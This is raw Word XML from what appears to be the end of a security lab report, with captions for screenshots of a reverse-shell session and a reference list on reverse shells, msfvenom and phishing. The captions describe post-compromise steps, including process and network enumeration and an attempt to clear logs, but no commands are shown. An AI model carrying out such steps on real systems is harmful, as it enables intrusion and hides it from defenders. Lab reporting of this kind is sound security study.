            <wp:docPr id="39" name="Picture 39"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descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2682330" cy="1385871"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB757E3" w14:textId="781BBD59" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - list the network information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E45AE8" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52205F00" wp14:editId="7E6F37E6">
            <wp:extent cx="4864309" cy="4533266"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="40" name="Picture 40" descr="Graphical user interface,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 name="Picture 40" descr="Graphical user interface, text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4874828" cy="4543070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A3DE0" w14:textId="42D45067" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - list all running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF29E59" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06F64070" wp14:editId="652800FE">
            <wp:extent cx="5343993" cy="381007"/>
            <wp:effectExtent l="0" t="0" r="3175" b="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 name="Picture 41"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5391299" cy="384380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1361DB16" w14:textId="563700F3" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - calc.exe running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD7715E" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C6BB591" wp14:editId="031B45D9">
            <wp:extent cx="4339653" cy="932222"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="42" name="Picture 4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2" name="Picture 42" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4395201" cy="944155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFBBB61" w14:textId="6B5BC847" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - attempt to enter Administrator director and clear logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624FD65F" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3513098D" wp14:editId="5AEC176B">
            <wp:extent cx="3087974" cy="818181"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43" name="Picture 43"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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3127840" cy="828744"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="682AE04F" w14:textId="5733ADDD" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - get information about active user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3436CB43" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FC5F76" w14:textId="7FA103F8" w:rsidR="00BA62F1" w:rsidRDefault="00BA62F1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C4D46" w14:textId="506C40BC" w:rsidR="00460E99" w:rsidRDefault="00460E99" w:rsidP="00FE5C3A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc85145536"/>
      <w:r w:rsidRPr="00271429">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="772E57B1" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="480" w:hanging="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Banach, Z. (2019, December 3). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Understanding Reverse Shells</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.netsparker.com/blog/web-security/understanding-reverse-shells/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47E709D3" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="480" w:hanging="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Introducing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Rapid7 Blog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. (2011, May 24). Rapid7. </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/blog/post/2011/05/24/introducing-msfvenom/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0570CC7B" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="480" w:hanging="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">KnowBe4. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Phishing | Phishing Techniques</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Retrieved October 14, 2021, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.phishing.org/phishing-techniques</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53614294" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="480" w:hanging="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>What is a watering hole attack?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (n.d.). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SearchSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Retrieved October 14, 2021, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://searchsecurity.techtarget.com/definition/watering-hole-attack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DBE4841" w14:textId="77777777" w:rsidR="00460E99" w:rsidRDefault="00460E99" w:rsidP="00460E99"/>
    <w:sectPr w:rsidR="00460E99" w:rsidSect="00170E49">
      <w:footerReference w:type="first" r:id="rId41"/>
      <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="1440" w:footer="432" w:gutter="0"/>
      <w:cols w:space="720"/>
      <w:noEndnote/>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BC33A5" w14:textId="77777777" w:rsidR="00C879BC" w:rsidRDefault="00C879BC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="01EBBDE2" w14:textId="77777777" w:rsidR="00C879BC" w:rsidRDefault="00C879B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Helvetica">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00002FF" w:usb1="5000785B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Malgun Gothic">
    <w:panose1 w:val="020B0503020000020004"/>
    <w:charset w:val="81"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="9000002F" w:usb1="29D77CFB" w:usb2="00000012" w:usb3="00000000" w:csb0="0008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1766B6" w14:textId="5670BC0D" w:rsidR="005976AB" w:rsidRDefault="005976AB">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00CA22F7">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>4</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CA22F7">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>4</w:t>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="0ECC1203" w14:textId="77777777" w:rsidR="005976AB" w:rsidRPr="00A076D5" w:rsidRDefault="005976AB" w:rsidP="00A076D5">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4320"/>
        <w:tab w:val="clear" w:pos="8640"/>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>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A8F0B7" w14:textId="5EBCE4B6" w:rsidR="005976AB" w:rsidRDefault="005976AB" w:rsidP="0054249E">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00672A08">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>1</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672A08">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>4</w:t>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="4A279B8F" w14:textId="77777777" w:rsidR="005976AB" w:rsidRDefault="005976AB">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90C90EB" w14:textId="7F26D09A" w:rsidR="005976AB" w:rsidRDefault="005976AB" w:rsidP="0054249E">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00672A08">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES  </w:instrText>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00672A08">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>4</w:t>
    </w:r>
    <w:r w:rsidR="004958E8">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="62205020" w14:textId="77777777" w:rsidR="005976AB" w:rsidRDefault="005976A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056EA95" w14:textId="77777777" w:rsidR="00C879BC" w:rsidRDefault="00C879BC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2BD97429" w14:textId="77777777" w:rsidR="00C879BC" w:rsidRDefault="00C879B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0A918B0" w14:textId="30007EAC" w:rsidR="005976AB" w:rsidRDefault="005976AB" w:rsidP="00247A3A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="7224D7B3" w14:textId="77777777" w:rsidR="005976AB" w:rsidRDefault="005976AB" w:rsidP="002B1834">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:tab/>
    </w:r>
    <w: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3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B5F626EA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Heading9"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF89"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E1365190"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFFFB"/>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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00BF4559"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="790AE782"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="06B27E4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F1E7FE4"/>
    <w:lvl w:ilvl="0" w:tplc="65284DF6">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
